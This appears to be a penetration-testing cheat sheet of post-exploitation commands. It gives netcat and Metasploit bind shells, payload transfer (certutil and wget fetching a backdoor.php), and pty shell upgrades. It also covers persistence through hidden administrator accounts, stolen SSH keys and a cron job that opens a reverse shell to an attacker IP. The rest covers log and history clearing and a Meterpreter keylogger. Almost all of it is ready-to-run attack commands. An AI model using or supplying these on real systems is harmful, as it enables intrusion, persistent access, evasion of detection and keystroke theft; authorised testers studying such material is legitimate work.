This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.
# Windows (target)
nc -nvlp <target_port> -e cmd.exe
nc.exe -nvlp <target_port> -e cmd.exe
# Linux (target)
nc -nvlp <target_port> -e /bin/bash
# Linux (attacker)
nc -nv <target_ip> <target_port>
# Windows (attacker)
nc.exe -nv <target_ip> <target_port>
# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080
# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php
# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php # [recepient]
nc -w 3 <ip> <target_port> < backdoor.php # [sender]
# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file
# Tips
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php
# Note: netcat "-n" option means no DNS (only IP)Interactive shell
/bin/bash -i # LinuxFully interactive shell
# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# 2 Step
CTRL + Z # Press CTRL + Z to background process and get back to your host machine
# 3 Step
stty raw -echo; fg
# 4 Step
export TERM=xtermAutomatic
# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported.
# There's basic support (netcat-like interaction + logging)
./penelope.py <port> # Reverse shell
./penelope.py -c <target> <port> # Bind shell(1) Metasploit - Module: Search persistence
module (Windows). Ex:
exploit/windows/local/persistence_service (Requires
admin or system privileges). When you want to connect again set a
listener to receive the connection
(2) Enable RDP
First way with metasploit: search enable_rdp
(and set session). Then connect to victim.
Note: You need username and password, if you don’t have the password, change it
net user <username> <new_pass>(suspicious in a real environment) or crack NTLM or you can create a new account and add it to administrator group.
Second way with metasploit/meterpreter (auto create account and settings):
# In meterpreter
run getgui -e -u user_you_want -p password_you_want
# This enables rdp service ->
# Creates new user with the provided parameters ->
# Hides user from windows login screen ->
# Adds user to Remote Desktop Users and Administrators group(1) Metasploit: Search persistence module
(Linux). Example: post/linux/manage/sshkey_persistence
(needed elevated privs - This module will add an SSH key to a
specified user)
(2) Via SSH key: After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH
(3) With cron jobs
# 1. Set up listener
# 2. Create a cronjob (every minute time format)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
# 3. This will replace the user's existing crontab with the contents of 'cron'
crontab cron
# Crontab for the current user
crontab -l
# NOTE: if the command doesn't work try with another revshellWindows
# Metasploit/Meterpreter
clearev # Clear the Application, System, and Security logs on a Windows systemLinux
history -c # Clear history
cat /dev/null > ~/.bash_history # Same as above# With metasploit
keyscan_start # Start keylogger
keyscan_dump print # Captured strokes